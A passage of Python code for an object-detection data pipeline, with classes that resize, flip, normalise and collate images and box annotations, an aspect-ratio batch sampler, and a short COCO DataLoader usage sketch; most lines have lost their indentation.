for i in range(batch_size):
img = imgs[i]
padded_imgs[i, :int(img.shape[0]), :int(img.shape[1]), :] = img
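    # pad annotations with rows of -1 so every sample in the batch has the same
    # number of annotation rows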
max_num_annots = max(annot.shape[0] for annot in annots)
    if max_num_annots > 0:
        annot_padded = torch.ones((len(annots), max_num_annots, 5)) * -1
        for idx, annot in enumerate(annots):
            # print(annot.shape)
            if annot.shape[0] > 0:
                annot_padded[idx, :annot.shape[0], :] = annot
else:
annot_padded = torch.ones((len(annots), 1, 5)) * -1
padded_imgs = padded_imgs.permute(0, 3, 1, 2)
return {'img': padded_imgs, 'annot': annot_padded, 'scale': scales}
class Resizer(object):
"""Convert ndarrays in sample to Tensors."""
def __call__(self, sample, min_side=608, max_side=1024):
image, annots = sample['img'], sample['annot']
rows, cols, cns = image.shape
smallest_side = min(rows, cols)
# rescale the image so the smallest side is min_side
scale = min_side / smallest_side
# check if the largest side is now greater than max_side, which can happen
# when images have a large aspect ratio
largest_side = max(rows, cols)
if largest_side * scale > max_side:
scale = max_side / largest_side
# resize the image with the computed scale
image = skimage.transform.resize(image, (int(round(rows*scale)), int(round((cols*scale)))))
rows, cols, cns = image.shape
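        # pad each spatial dimension up to a multiple of 32, as FPN-style backbones
        # typically require inputs divisible by the largest feature-map stride
        # (note: a side already a multiple of 32 still gets a full 32 pixels of padding here)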
pad_w = 32 - rows%32
pad_h = 32 - cols%32
new_image = np.zeros((rows + pad_w, cols + pad_h, cns)).astype(np.float32)
new_image[:rows, :cols, :] = image.astype(np.float32)
annots[:, :4] *= scale
return {'img': torch.from_numpy(new_image), 'annot': torch.from_numpy(annots), 'scale': scale}
class Augmenter(object):
"""Convert ndarrays in sample to Tensors."""
def __call__(self, sample, flip_x=0.5):
if np.random.rand() < flip_x:
image, annots = sample['img'], sample['annot']
image = image[:, ::-1, :]
rows, cols, channels = image.shape
x1 = annots[:, 0].copy()
x2 = annots[:, 2].copy()
x_tmp = x1.copy()
annots[:, 0] = cols - x2
annots[:, 2] = cols - x_tmp
sample = {'img': image, 'annot': annots}
return sample
class Normalizer(object):
def __init__(self):
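        # standard ImageNet channel means / stds, matching torchvision's pretrained backbones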
self.mean = np.array([[[0.485, 0.456, 0.406]]])
self.std = np.array([[[0.229, 0.224, 0.225]]])
def __call__(self, sample):
image, annots = sample['img'], sample['annot']
return {'img':((image.astype(np.float32)-self.mean)/self.std), 'annot': annots}
class UnNormalizer(object):
def __init__(self, mean=None, std=None):
        if mean is None:
            self.mean = [0.485, 0.456, 0.406]
        else:
            self.mean = mean
        if std is None:
            self.std = [0.229, 0.224, 0.225]
        else:
            self.std = std
def __call__(self, tensor):
"""
Args:
            tensor (Tensor): Normalized tensor image of size (C, H, W).
        Returns:
            Tensor: Un-normalized image (the ImageNet mean/std scaling is reversed).
"""
for t, m, s in zip(tensor, self.mean, self.std):
t.mul_(s).add_(m)
return tensor
class AspectRatioBasedSampler(Sampler):
def __init__(self, data_source, batch_size, drop_last):
self.data_source = data_source
self.batch_size = batch_size
self.drop_last = drop_last
self.groups = self.group_images()
def __iter__(self):
random.shuffle(self.groups)
for group in self.groups:
yield group
def __len__(self):
if self.drop_last:
return len(self.data_source) // self.batch_size
else:
return (len(self.data_source) + self.batch_size - 1) // self.batch_size
def group_images(self):
# determine the order of the images
order = list(range(len(self.data_source)))
order.sort(key=lambda x: self.data_source.image_aspect_ratio(x))
# divide into groups, one group = one batch
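        # (the modulo makes the final batch wrap around to the start of the
        # ordering instead of being shorter than batch_size)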
return [[order[x % len(order)] for x in range(i, i + self.batch_size)] for i in range(0, len(order), self.batch_size)]
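# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): one plausible way to
# wire the classes above into a PyTorch DataLoader for a retinanet-style
# training loop. The dataset root below is a hypothetical path.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    dataset = CocoDataset(
        '/path/to/coco',  # hypothetical root containing annotations/ and train2017/
        set_name='train2017',
        transform=transforms.Compose([Normalizer(), Augmenter(), Resizer()]),
    )
    sampler = AspectRatioBasedSampler(dataset, batch_size=2, drop_last=False)
    loader = DataLoader(dataset, num_workers=2, collate_fn=collater, batch_sampler=sampler)
    for batch in loader:
        # batch['img'] is (N, 3, H, W); batch['annot'] is (N, max_boxes, 5), padded with -1
        print(batch['img'].shape, batch['annot'].shape)
        break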
|